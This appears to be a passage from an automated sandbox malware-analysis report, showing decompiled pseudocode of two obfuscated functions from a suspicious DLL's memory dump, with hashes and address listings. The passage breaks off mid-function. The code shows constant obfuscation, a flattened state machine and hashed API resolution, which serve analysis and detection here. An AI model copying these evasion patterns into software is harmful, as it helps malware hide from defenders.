                                                                                                                                                                            • Instruction Fuzzy Hash: F7123671D00218DBDF28DFE5D989AEEBBB2FB44354F248159D219BB260D7B04A96CF40
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E02F700EF(void* __ecx) {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				char _v1040;
                                                                                                                                                                            				char _v1560;
                                                                                                                                                                            				void* _v1572;
                                                                                                                                                                            				intOrPtr _v1576;
                                                                                                                                                                            				signed int _v1580;
                                                                                                                                                                            				signed int _v1584;
                                                                                                                                                                            				signed int _v1588;
                                                                                                                                                                            				signed int _v1592;
                                                                                                                                                                            				signed int _v1596;
                                                                                                                                                                            				signed int _v1600;
                                                                                                                                                                            				signed int _v1604;
                                                                                                                                                                            				signed int _v1608;
                                                                                                                                                                            				signed int _v1612;
                                                                                                                                                                            				signed int _v1616;
                                                                                                                                                                            				signed int _v1620;
                                                                                                                                                                            				signed int _v1624;
                                                                                                                                                                            				signed int _v1628;
                                                                                                                                                                            				signed int _v1632;
                                                                                                                                                                            				signed int _v1636;
                                                                                                                                                                            				signed int _v1640;
                                                                                                                                                                            				signed int _v1644;
                                                                                                                                                                            				unsigned int _v1648;
                                                                                                                                                                            				signed int _v1652;
                                                                                                                                                                            				signed int _v1656;
                                                                                                                                                                            				signed int _v1660;
                                                                                                                                                                            				signed int _v1664;
                                                                                                                                                                            				signed int _v1668;
                                                                                                                                                                            				signed int _v1672;
                                                                                                                                                                            				signed int _v1676;
                                                                                                                                                                            				signed int _v1680;
                                                                                                                                                                            				signed int _v1684;
                                                                                                                                                                            				signed int _v1688;
                                                                                                                                                                            				signed int _v1692;
                                                                                                                                                                            				signed int _t303;
                                                                                                                                                                            				void* _t316;
                                                                                                                                                                            				signed int _t318;
                                                                                                                                                                            				signed int _t319;
                                                                                                                                                                            				signed int _t320;
                                                                                                                                                                            				signed int _t321;
                                                                                                                                                                            				signed int _t322;
                                                                                                                                                                            				signed int _t323;
                                                                                                                                                                            				signed int _t324;
                                                                                                                                                                            				signed int _t325;
                                                                                                                                                                            				signed int _t326;
                                                                                                                                                                            				signed int _t327;
                                                                                                                                                                            				signed int _t328;
                                                                                                                                                                            				void* _t370;
                                                                                                                                                                            				signed int* _t373;
                                                                                                                                                                            
                                                                                                                                                                            				_t373 =  &_v1692;
                                                                                                                                                                            				_v1576 = 0xe8da59;
                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				_t316 = __ecx;
                                                                                                                                                                            				_t318 = 0x5a;
                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				_t370 = 0x219adc7;
                                                                                                                                                                            				asm("stosd");
                                                                                                                                                                            				_v1592 = 0x4cba20;
                                                                                                                                                                            				_v1592 = _v1592 / _t318;
                                                                                                                                                                            				_v1592 = _v1592 ^ 0x000e53d2;
                                                                                                                                                                            				_v1660 = 0x37da44;
                                                                                                                                                                            				_v1660 = _v1660 | 0x897b84ec;
                                                                                                                                                                            				_v1660 = _v1660 >> 7;
                                                                                                                                                                            				_v1660 = _v1660 ^ 0x011e0d16;
                                                                                                                                                                            				_v1628 = 0x1c89a1;
                                                                                                                                                                            				_v1628 = _v1628 | 0x8af6c41c;
                                                                                                                                                                            				_v1628 = _v1628 ^ 0x8af282b8;
                                                                                                                                                                            				_v1684 = 0xdb2dca;
                                                                                                                                                                            				_v1684 = _v1684 | 0x5a04171c;
                                                                                                                                                                            				_t319 = 0xb;
                                                                                                                                                                            				_v1684 = _v1684 * 0x1a;
                                                                                                                                                                            				_v1684 = _v1684 >> 0xb;
                                                                                                                                                                            				_v1684 = _v1684 ^ 0x000c87cc;
                                                                                                                                                                            				_v1676 = 0x832ed6;
                                                                                                                                                                            				_v1676 = _v1676 / _t319;
                                                                                                                                                                            				_t320 = 5;
                                                                                                                                                                            				_v1676 = _v1676 / _t320;
                                                                                                                                                                            				_v1676 = _v1676 ^ 0xed35e4ac;
                                                                                                                                                                            				_v1676 = _v1676 ^ 0xed379c5b;
                                                                                                                                                                            				_v1616 = 0xcbfb93;
                                                                                                                                                                            				_v1616 = _v1616 >> 7;
                                                                                                                                                                            				_v1616 = _v1616 ^ 0x000d5997;
                                                                                                                                                                            				_v1688 = 0xe655f9;
                                                                                                                                                                            				_v1688 = _v1688 + 0xffff9882;
                                                                                                                                                                            				_t321 = 0x2b;
                                                                                                                                                                            				_v1688 = _v1688 * 0xb;
                                                                                                                                                                            				_v1688 = _v1688 * 0x5b;
                                                                                                                                                                            				_v1688 = _v1688 ^ 0x83159ef1;
                                                                                                                                                                            				_v1692 = 0xaa6b82;
                                                                                                                                                                            				_v1692 = _v1692 | 0xcfd3fae0;
                                                                                                                                                                            				_v1692 = _v1692 / _t321;
                                                                                                                                                                            				_v1692 = _v1692 * 0x7a;
                                                                                                                                                                            				_v1692 = _v1692 ^ 0x4e1b8b3c;
                                                                                                                                                                            				_v1644 = 0x70af24;
                                                                                                                                                                            				_v1644 = _v1644 << 5;
                                                                                                                                                                            				_v1644 = _v1644 | 0xf364d4b3;
                                                                                                                                                                            				_v1644 = _v1644 ^ 0xff7a96be;
                                                                                                                                                                            				_v1668 = 0x4a582b;
                                                                                                                                                                            				_v1668 = _v1668 * 0x66;
                                                                                                                                                                            				_v1668 = _v1668 << 0xf;
                                                                                                                                                                            				_v1668 = _v1668 ^ 0x909bc222;
                                                                                                                                                                            				_v1636 = 0x31215f;
                                                                                                                                                                            				_v1636 = _v1636 ^ 0x6923b039;
                                                                                                                                                                            				_t322 = 0x29;
                                                                                                                                                                            				_v1636 = _v1636 / _t322;
                                                                                                                                                                            				_v1636 = _v1636 ^ 0x029cf3aa;
                                                                                                                                                                            				_v1652 = 0x9b2524;
                                                                                                                                                                            				_t323 = 0x38;
                                                                                                                                                                            				_v1652 = _v1652 / _t323;
                                                                                                                                                                            				_v1652 = _v1652 ^ 0x48c3dfd8;
                                                                                                                                                                            				_v1652 = _v1652 ^ 0x48c1ce16;
                                                                                                                                                                            				_v1608 = 0x82759;
                                                                                                                                                                            				_v1608 = _v1608 >> 9;
                                                                                                                                                                            				_v1608 = _v1608 ^ 0x000ff1e7;
                                                                                                                                                                            				_v1580 = 0x9cb9ac;
                                                                                                                                                                            				_v1580 = _v1580 + 0xffffe541;
                                                                                                                                                                            				_v1580 = _v1580 ^ 0x0099fe2e;
                                                                                                                                                                            				_v1648 = 0xf0b12f;
                                                                                                                                                                            				_v1648 = _v1648 >> 3;
                                                                                                                                                                            				_v1648 = _v1648 >> 0xc;
                                                                                                                                                                            				_v1648 = _v1648 ^ 0x000b1180;
                                                                                                                                                                            				_v1680 = 0x5a67b4;
                                                                                                                                                                            				_t324 = 0x1f;
                                                                                                                                                                            				_v1680 = _v1680 / _t324;
                                                                                                                                                                            				_t325 = 0x30;
                                                                                                                                                                            				_v1680 = _v1680 * 0x62;
                                                                                                                                                                            				_v1680 = _v1680 / _t325;
                                                                                                                                                                            				_v1680 = _v1680 ^ 0x000c0a94;
                                                                                                                                                                            				_v1656 = 0x7af90a;
                                                                                                                                                                            				_v1656 = _v1656 >> 0x10;
                                                                                                                                                                            				_v1656 = _v1656 ^ 0xd48e11dc;
                                                                                                                                                                            				_v1656 = _v1656 ^ 0xd48f85db;
                                                                                                                                                                            				_v1664 = 0xc7c49c;
                                                                                                                                                                            				_v1664 = _v1664 ^ 0x0b3147da;
                                                                                                                                                                            				_v1664 = _v1664 ^ 0x91b20725;
                                                                                                                                                                            				_v1664 = _v1664 ^ 0x9a45c1a7;
                                                                                                                                                                            				_v1584 = 0x3444f6;
                                                                                                                                                                            				_v1584 = _v1584 << 2;
                                                                                                                                                                            				_v1584 = _v1584 ^ 0x00d71217;
                                                                                                                                                                            				_v1624 = 0x130de1;
                                                                                                                                                                            				_t326 = 0x58;
                                                                                                                                                                            				_v1624 = _v1624 / _t326;
                                                                                                                                                                            				_v1624 = _v1624 ^ 0x000fc6c7;
                                                                                                                                                                            				_v1588 = 0xc870d9;
                                                                                                                                                                            				_v1588 = _v1588 >> 7;
                                                                                                                                                                            				_v1588 = _v1588 ^ 0x00060dd4;
                                                                                                                                                                            				_v1600 = 0xa62b50;
                                                                                                                                                                            				_v1600 = _v1600 | 0x0b3ea590;
                                                                                                                                                                            				_v1600 = _v1600 ^ 0x0bb32963;
                                                                                                                                                                            				_v1640 = 0x5829fa;
                                                                                                                                                                            				_v1640 = _v1640 >> 0x10;
                                                                                                                                                                            				_v1640 = _v1640 * 7;
                                                                                                                                                                            				_v1640 = _v1640 ^ 0x000c8c8e;
                                                                                                                                                                            				_v1620 = 0x9954e5;
                                                                                                                                                                            				_v1620 = _v1620 | 0x46050794;
                                                                                                                                                                            				_v1620 = _v1620 ^ 0x46999c00;
                                                                                                                                                                            				_v1672 = 0x8b6b4f;
                                                                                                                                                                            				_v1672 = _v1672 ^ 0x051743d3;
                                                                                                                                                                            				_v1672 = _v1672 + 0x5fbf;
                                                                                                                                                                            				_v1672 = _v1672 * 0x44;
                                                                                                                                                                            				_v1672 = _v1672 ^ 0x7d983568;
                                                                                                                                                                            				_v1596 = 0x4b105f;
                                                                                                                                                                            				_v1596 = _v1596 ^ 0x074c3e20;
                                                                                                                                                                            				_v1596 = _v1596 ^ 0x0709a291;
                                                                                                                                                                            				_v1632 = 0x867cf1;
                                                                                                                                                                            				_v1632 = _v1632 + 0x5758;
                                                                                                                                                                            				_v1632 = _v1632 << 0xb;
                                                                                                                                                                            				_v1632 = _v1632 ^ 0x36a3bfa7;
                                                                                                                                                                            				_v1604 = 0x1e01e;
                                                                                                                                                                            				_t327 = 0x6d;
                                                                                                                                                                            				_v1604 = _v1604 / _t327;
                                                                                                                                                                            				_v1604 = _v1604 ^ 0x000451f9;
                                                                                                                                                                            				_v1612 = 0x51328f;
                                                                                                                                                                            				_t328 = 0x66;
                                                                                                                                                                            				_t303 = _v1612 / _t328;
                                                                                                                                                                            				_v1612 = _t303;
                                                                                                                                                                            				_v1612 = _v1612 ^ 0x000ccfe8;
                                                                                                                                                                            				while(_t370 != 0x219adc7) {
                                                                                                                                                                            					if(_t370 == 0x472b880) {
                                                                                                                                                                            						_push(_t328);
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            						return E02F685FF(_v1596, _v1632, 0, 0, 0,  &_v1560, _v1604, 0, _v1612);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t379 = _t370 - 0x6430241;
                                                                                                                                                                            					if(_t370 != 0x6430241) {
                                                                                                                                                                            						L7:
                                                                                                                                                                            						__eflags = _t370 - 0xc99ad3;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							return _t303;
                                                                                                                                                                            						}
                                                                                                                                                                            						L10:
                                                                                                                                                                            						return _t303;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F70DB1(_v1592,  &_v1040, _t379, _v1660, _t328, _v1628);
                                                                                                                                                                            					 *((short*)(E02F609DD(_v1684,  &_v1040, _v1676, _v1616))) = 0;
                                                                                                                                                                            					E02F5BAA9(_v1688, _v1692, _t379, _v1644, _v1668,  &_v520);
                                                                                                                                                                            					_push(_v1580);
                                                                                                                                                                            					_push(_v1608);
                                                                                                                                                                            					_push(_v1652);
                                                                                                                                                                            					E02F72D0A(_v1680, _t379,  &_v520, _v1656, _v1664, _v1584, 0x2f518bc,  &_v1560,  &_v1040, E02F6E1F8(0x2f518bc, _v1636, _t379));
                                                                                                                                                                            					E02F6FECB(_t310, _v1624, _v1588, _v1600, _v1640);
                                                                                                                                                                            					_t328 = _v1620;
                                                                                                                                                                            					_t303 = E02F5BFBE( &_v1560, _t316, _v1672);
                                                                                                                                                                            					_t373 =  &(_t373[0x18]);
                                                                                                                                                                            					if(_t303 != 0) {
                                                                                                                                                                            						_t370 = 0x472b880;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t370 = 0x6430241;
                                                                                                                                                                            				goto L7;
                                                                                                                                                                            			}




















































                                                                                                                                                                            0x02f700ef
                                                                                                                                                                            0x02f700f5
                                                                                                                                                                            0x02f7010c
                                                                                                                                                                            0x02f7010d
                                                                                                                                                                            0x02f70111
                                                                                                                                                                            0x02f70114
                                                                                                                                                                            0x02f70115
                                                                                                                                                                            0x02f7011a
                                                                                                                                                                            0x02f7011b
                                                                                                                                                                            0x02f7012b
                                                                                                                                                                            0x02f7012f
                                                                                                                                                                            0x02f70137
                                                                                                                                                                            0x02f7013f
                                                                                                                                                                            0x02f70147
                                                                                                                                                                            0x02f7014c
                                                                                                                                                                            0x02f70154
                                                                                                                                                                            0x02f7015c
                                                                                                                                                                            0x02f70164
                                                                                                                                                                            0x02f7016c
                                                                                                                                                                            0x02f70174
                                                                                                                                                                            0x02f70181
                                                                                                                                                                            0x02f70184
                                                                                                                                                                            0x02f70188
                                                                                                                                                                            0x02f7018d
                                                                                                                                                                            0x02f70195
                                                                                                                                                                            0x02f701a5
                                                                                                                                                                            0x02f701ad
                                                                                                                                                                            0x02f701b2
                                                                                                                                                                            0x02f701b8
                                                                                                                                                                            0x02f701c0
                                                                                                                                                                            0x02f701c8
                                                                                                                                                                            0x02f701d0
                                                                                                                                                                            0x02f701d5
                                                                                                                                                                            0x02f701dd
                                                                                                                                                                            0x02f701e5
                                                                                                                                                                            0x02f701f2
                                                                                                                                                                            0x02f701f3
                                                                                                                                                                            0x02f701fc
                                                                                                                                                                            0x02f70200
                                                                                                                                                                            0x02f70208
                                                                                                                                                                            0x02f70210
                                                                                                                                                                            0x02f7021e
                                                                                                                                                                            0x02f70227
                                                                                                                                                                            0x02f7022b
                                                                                                                                                                            0x02f70233
                                                                                                                                                                            0x02f7023b
                                                                                                                                                                            0x02f70240
                                                                                                                                                                            0x02f70248
                                                                                                                                                                            0x02f70250
                                                                                                                                                                            0x02f7025d
                                                                                                                                                                            0x02f70261
                                                                                                                                                                            0x02f70266
                                                                                                                                                                            0x02f7026e
                                                                                                                                                                            0x02f70276
                                                                                                                                                                            0x02f70286
                                                                                                                                                                            0x02f7028b
                                                                                                                                                                            0x02f70291
                                                                                                                                                                            0x02f70299
                                                                                                                                                                            0x02f702a5
                                                                                                                                                                            0x02f702aa
                                                                                                                                                                            0x02f702b0
                                                                                                                                                                            0x02f702b8
                                                                                                                                                                            0x02f702c0
                                                                                                                                                                            0x02f702c8
                                                                                                                                                                            0x02f702cd
                                                                                                                                                                            0x02f702d5
                                                                                                                                                                            0x02f702e0
                                                                                                                                                                            0x02f702eb
                                                                                                                                                                            0x02f702f6
                                                                                                                                                                            0x02f702fe
                                                                                                                                                                            0x02f70303
                                                                                                                                                                            0x02f70308
                                                                                                                                                                            0x02f70310
                                                                                                                                                                            0x02f7031c
                                                                                                                                                                            0x02f70321
                                                                                                                                                                            0x02f7032c
                                                                                                                                                                            0x02f7032f
                                                                                                                                                                            0x02f7033b
                                                                                                                                                                            0x02f7033f
                                                                                                                                                                            0x02f70347
                                                                                                                                                                            0x02f7034f
                                                                                                                                                                            0x02f70354
                                                                                                                                                                            0x02f7035c
                                                                                                                                                                            0x02f70364
                                                                                                                                                                            0x02f7036c
                                                                                                                                                                            0x02f70374
                                                                                                                                                                            0x02f7037c
                                                                                                                                                                            0x02f70384
                                                                                                                                                                            0x02f7038f
                                                                                                                                                                            0x02f70397
                                                                                                                                                                            0x02f703a2
                                                                                                                                                                            0x02f703ae
                                                                                                                                                                            0x02f703b1
                                                                                                                                                                            0x02f703b5
                                                                                                                                                                            0x02f703bd
                                                                                                                                                                            0x02f703c5
                                                                                                                                                                            0x02f703ca
                                                                                                                                                                            0x02f703d2
                                                                                                                                                                            0x02f703da
                                                                                                                                                                            0x02f703e2
                                                                                                                                                                            0x02f703ea
                                                                                                                                                                            0x02f703f2
                                                                                                                                                                            0x02f703fc
                                                                                                                                                                            0x02f70400
                                                                                                                                                                            0x02f70408
                                                                                                                                                                            0x02f70410
                                                                                                                                                                            0x02f70418
                                                                                                                                                                            0x02f70420
                                                                                                                                                                            0x02f70428
                                                                                                                                                                            0x02f70430
                                                                                                                                                                            0x02f7043d
                                                                                                                                                                            0x02f70441
                                                                                                                                                                            0x02f70449
                                                                                                                                                                            0x02f70451
                                                                                                                                                                            0x02f7045b
                                                                                                                                                                            0x02f70468
                                                                                                                                                                            0x02f70475
                                                                                                                                                                            0x02f7047d
                                                                                                                                                                            0x02f70482
                                                                                                                                                                            0x02f7048a
                                                                                                                                                                            0x02f70498
                                                                                                                                                                            0x02f7049d
                                                                                                                                                                            0x02f704a3
                                                                                                                                                                            0x02f704ab
                                                                                                                                                                            0x02f704b7
                                                                                                                                                                            0x02f704b8
                                                                                                                                                                            0x02f704ba
                                                                                                                                                                            0x02f704be
                                                                                                                                                                            0x02f704c6
                                                                                                                                                                            0x02f704d4
                                                                                                                                                                            0x02f705e9
                                                                                                                                                                            0x02f705ee
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f7060f
                                                                                                                                                                            0x02f704da
                                                                                                                                                                            0x02f704dc
                                                                                                                                                                            0x02f705db
                                                                                                                                                                            0x02f705db
                                                                                                                                                                            0x02f705e1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f7061c
                                                                                                                                                                            0x02f7061c
                                                                                                                                                                            0x02f7061c
                                                                                                                                                                            0x02f704f9
                                                                                                                                                                            0x02f70518
                                                                                                                                                                            0x02f70533
                                                                                                                                                                            0x02f70538
                                                                                                                                                                            0x02f70544
                                                                                                                                                                            0x02f7054b
                                                                                                                                                                            0x02f7058e
                                                                                                                                                                            0x02f705ae
                                                                                                                                                                            0x02f705b7
                                                                                                                                                                            0x02f705c6
                                                                                                                                                                            0x02f705cb
                                                                                                                                                                            0x02f705d0
                                                                                                                                                                            0x02f705d2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f705d2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f705d0
                                                                                                                                                                            0x02f705d9
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $P$+XJ$XW$_!1
                                                                                                                                                                            • API String ID: 0-3524045022
                                                                                                                                                                            • Opcode ID: bb950c1c9fe62b4dd749e7ecee917dc9c45ccb04731a1293cea829b4db06cc93
                                                                                                                                                                            • Instruction ID: 616c59b1606b98142c84aa3fd913cde45f940088f4127e773a1febb86c34cc7c
                                                                                                                                                                            • Opcode Fuzzy Hash: bb950c1c9fe62b4dd749e7ecee917dc9c45ccb04731a1293cea829b4db06cc93
                                                                                                                                                                            • Instruction Fuzzy Hash: A3D103715093809FD368CF25C94AA5BFBF2FBC4748F108A1DF69996260D7B19908CF42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                            			E02F580C0(intOrPtr* __ecx) {
                                                                                                                                                                            				char _v128;
                                                                                                                                                                            				signed int _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				unsigned int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				unsigned int _v168;
                                                                                                                                                                            				intOrPtr* _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				unsigned int _v200;
                                                                                                                                                                            				signed int _v204;
                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                            				signed int _v212;
                                                                                                                                                                            				unsigned int _v216;
                                                                                                                                                                            				signed int _v220;
                                                                                                                                                                            				signed int _v224;
                                                                                                                                                                            				void* _t254;
                                                                                                                                                                            				void* _t262;
                                                                                                                                                                            				intOrPtr _t274;
                                                                                                                                                                            				intOrPtr _t275;
                                                                                                                                                                            				intOrPtr* _t276;
                                                                                                                                                                            				void* _t301;
                                                                                                                                                                            				signed int _t307;
                                                                                                                                                                            				signed int _t308;
                                                                                                                                                                            				signed int _t309;
                                                                                                                                                                            				signed int _t310;
                                                                                                                                                                            				signed int _t311;
                                                                                                                                                                            				signed int _t312;
                                                                                                                                                                            				signed int _t313;
                                                                                                                                                                            				intOrPtr _t314;
                                                                                                                                                                            				void* _t315;
                                                                                                                                                                            				intOrPtr _t318;
                                                                                                                                                                            				signed int* _t319;
                                                                                                                                                                            
                                                                                                                                                                            				_t276 = __ecx;
                                                                                                                                                                            				_t319 =  &_v224;
                                                                                                                                                                            				_v180 = 0xc71c90;
                                                                                                                                                                            				_v180 = _v180 * 0x55;
                                                                                                                                                                            				_t315 = 0xb85ea37;
                                                                                                                                                                            				_v180 = _v180 + 0xffff2ba7;
                                                                                                                                                                            				_v180 = _v180 ^ 0x4211e203;
                                                                                                                                                                            				_v140 = 0x3ad325;
                                                                                                                                                                            				_v140 = _v140 ^ 0x295262d9;
                                                                                                                                                                            				_v140 = _v140 ^ 0x29635001;
                                                                                                                                                                            				_v136 = 0xed3dcc;
                                                                                                                                                                            				_t307 = 0x6e;
                                                                                                                                                                            				_v172 = __ecx;
                                                                                                                                                                            				_v136 = _v136 * 0x41;
                                                                                                                                                                            				_v136 = _v136 ^ 0x3c3e3c90;
                                                                                                                                                                            				_v168 = 0x802272;
                                                                                                                                                                            				_v168 = _v168 + 0x3a4b;
                                                                                                                                                                            				_v168 = _v168 >> 4;
                                                                                                                                                                            				_v168 = _v168 ^ 0x0009cc0d;
                                                                                                                                                                            				_v144 = 0x950525;
                                                                                                                                                                            				_v144 = _v144 >> 0xb;
                                                                                                                                                                            				_v144 = _v144 ^ 0x0000417f;
                                                                                                                                                                            				_v132 = 0xde9c46;
                                                                                                                                                                            				_v132 = _v132 | 0x6a28fd38;
                                                                                                                                                                            				_v132 = _v132 ^ 0x6afd2d29;
                                                                                                                                                                            				_v152 = 0x89fdc2;
                                                                                                                                                                            				_v152 = _v152 + 0xffff27d1;
                                                                                                                                                                            				_v152 = _v152 / _t307;
                                                                                                                                                                            				_v152 = _v152 ^ 0x00002723;
                                                                                                                                                                            				_v208 = 0xb8ba68;
                                                                                                                                                                            				_t308 = 0x59;
                                                                                                                                                                            				_v208 = _v208 / _t308;
                                                                                                                                                                            				_v208 = _v208 | 0x82dd863f;
                                                                                                                                                                            				_t309 = 0x24;
                                                                                                                                                                            				_v208 = _v208 / _t309;
                                                                                                                                                                            				_v208 = _v208 ^ 0x03ab2b52;
                                                                                                                                                                            				_v200 = 0x881ce0;
                                                                                                                                                                            				_t310 = 0x22;
                                                                                                                                                                            				_v200 = _v200 / _t310;
                                                                                                                                                                            				_v200 = _v200 >> 6;
                                                                                                                                                                            				_v200 = _v200 + 0x7e14;
                                                                                                                                                                            				_v200 = _v200 ^ 0x000ee7c7;
                                                                                                                                                                            				_v216 = 0xe9a9fc;
                                                                                                                                                                            				_v216 = _v216 >> 0xa;
                                                                                                                                                                            				_v216 = _v216 * 0x7c;
                                                                                                                                                                            				_v216 = _v216 >> 3;
                                                                                                                                                                            				_v216 = _v216 ^ 0x000159fc;
                                                                                                                                                                            				_v148 = 0xc6b5e0;
                                                                                                                                                                            				_v148 = _v148 >> 8;
                                                                                                                                                                            				_v148 = _v148 ^ 0x0008baff;
                                                                                                                                                                            				_v192 = 0x70df9a;
                                                                                                                                                                            				_v192 = _v192 | 0xc7ad4485;
                                                                                                                                                                            				_v192 = _v192 << 0xe;
                                                                                                                                                                            				_v192 = _v192 * 0x6c;
                                                                                                                                                                            				_v192 = _v192 ^ 0x95ca127f;
                                                                                                                                                                            				_v164 = 0x9f9928;
                                                                                                                                                                            				_v164 = _v164 + 0x9182;
                                                                                                                                                                            				_v164 = _v164 | 0x4431d27d;
                                                                                                                                                                            				_v164 = _v164 ^ 0x44b31704;
                                                                                                                                                                            				_v156 = 0x8a7155;
                                                                                                                                                                            				_v156 = _v156 ^ 0x4b85dc4d;
                                                                                                                                                                            				_v156 = _v156 << 3;
                                                                                                                                                                            				_v156 = _v156 ^ 0x587c4d22;
                                                                                                                                                                            				_v184 = 0xc4c18b;
                                                                                                                                                                            				_v184 = _v184 ^ 0x011789e6;
                                                                                                                                                                            				_v184 = _v184 | 0x4a7cbaeb;
                                                                                                                                                                            				_v184 = _v184 ^ 0x4bf1fe8b;
                                                                                                                                                                            				_v160 = 0x793715;
                                                                                                                                                                            				_v160 = _v160 | 0xbf52a4ae;
                                                                                                                                                                            				_v160 = _v160 ^ 0x0f7ea677;
                                                                                                                                                                            				_v160 = _v160 ^ 0xb008de62;
                                                                                                                                                                            				_v212 = 0x3fdf0f;
                                                                                                                                                                            				_v212 = _v212 + 0xffffd1fd;
                                                                                                                                                                            				_t311 = 7;
                                                                                                                                                                            				_t318 = _v172;
                                                                                                                                                                            				_v212 = _v212 * 0x1c;
                                                                                                                                                                            				_v212 = _v212 >> 5;
                                                                                                                                                                            				_v212 = _v212 ^ 0x0033b954;
                                                                                                                                                                            				_v220 = 0x4e6c7b;
                                                                                                                                                                            				_v220 = _v220 >> 4;
                                                                                                                                                                            				_t275 = _v172;
                                                                                                                                                                            				_v220 = _v220 / _t311;
                                                                                                                                                                            				_v220 = _v220 + 0x72d0;
                                                                                                                                                                            				_v220 = _v220 ^ 0x000bd6ae;
                                                                                                                                                                            				_v176 = 0xb64387;
                                                                                                                                                                            				_v176 = _v176 + 0xffff3763;
                                                                                                                                                                            				_v176 = _v176 >> 0x10;
                                                                                                                                                                            				_v176 = _v176 ^ 0x000cc814;
                                                                                                                                                                            				_v224 = 0xc05028;
                                                                                                                                                                            				_v224 = _v224 + 0xffff6137;
                                                                                                                                                                            				_v224 = _v224 >> 1;
                                                                                                                                                                            				_v224 = _v224 ^ 0x7bfc229c;
                                                                                                                                                                            				_v224 = _v224 ^ 0x7ba9fc4e;
                                                                                                                                                                            				_v188 = 0xb7ebf2;
                                                                                                                                                                            				_v188 = _v188 >> 9;
                                                                                                                                                                            				_v188 = _v188 ^ 0x513bd66b;
                                                                                                                                                                            				_t312 = 0x35;
                                                                                                                                                                            				_v188 = _v188 * 0x6b;
                                                                                                                                                                            				_v188 = _v188 ^ 0xf3ed84ff;
                                                                                                                                                                            				_v196 = 0x918e67;
                                                                                                                                                                            				_v196 = _v196 >> 0xb;
                                                                                                                                                                            				_v196 = _v196 / _t312;
                                                                                                                                                                            				_t313 = 0x12;
                                                                                                                                                                            				_t314 = _v172;
                                                                                                                                                                            				_v196 = _v196 / _t313;
                                                                                                                                                                            				_v196 = _v196 ^ 0x000cd5f1;
                                                                                                                                                                            				_v204 = 0xbd465b;
                                                                                                                                                                            				_v204 = _v204 ^ 0x40a0ad4b;
                                                                                                                                                                            				_v204 = _v204 * 0x5a;
                                                                                                                                                                            				_v204 = _v204 >> 6;
                                                                                                                                                                            				_v204 = _v204 ^ 0x022df88e;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t254 = 0x58c5d57;
                                                                                                                                                                            					do {
                                                                                                                                                                            						while(_t315 != 0x26b32e) {
                                                                                                                                                                            							if(_t315 == _t254) {
                                                                                                                                                                            								_push(_v160);
                                                                                                                                                                            								_push(_v184);
                                                                                                                                                                            								_push(_v156);
                                                                                                                                                                            								_t262 = E02F6E1F8(0x2f51738, _v164, __eflags);
                                                                                                                                                                            								_push(_t314);
                                                                                                                                                                            								_push( &_v128);
                                                                                                                                                                            								_push(_t262);
                                                                                                                                                                            								_push(_t318);
                                                                                                                                                                            								_push(_t275);
                                                                                                                                                                            								 *((intOrPtr*)(E02F731AA(0xb00b1257, 0x44)))();
                                                                                                                                                                            								E02F6FECB(_t262, _v212, _v220, _v176, _v224);
                                                                                                                                                                            								_t319 =  &(_t319[0xb]);
                                                                                                                                                                            								_t315 = 0x5b11858;
                                                                                                                                                                            								goto L12;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t315 == 0x5b11858) {
                                                                                                                                                                            									E02F72B09(_v188, _t314, _v196, _v204);
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t315 == 0xa9c05ca) {
                                                                                                                                                                            										_t314 = E02F70A64( *((intOrPtr*)(_t276 + 4)),  *_t276, _v152, _v208);
                                                                                                                                                                            										__eflags = _t314;
                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                            											_t315 = 0xed0de4e;
                                                                                                                                                                            											L12:
                                                                                                                                                                            											_t276 = _v172;
                                                                                                                                                                            											goto L1;
                                                                                                                                                                            										}
                                                                                                                                                                            									} else {
                                                                                                                                                                            										if(_t315 == 0xb85ea37) {
                                                                                                                                                                            											_t315 = 0x26b32e;
                                                                                                                                                                            											continue;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											if(_t315 != 0xed0de4e) {
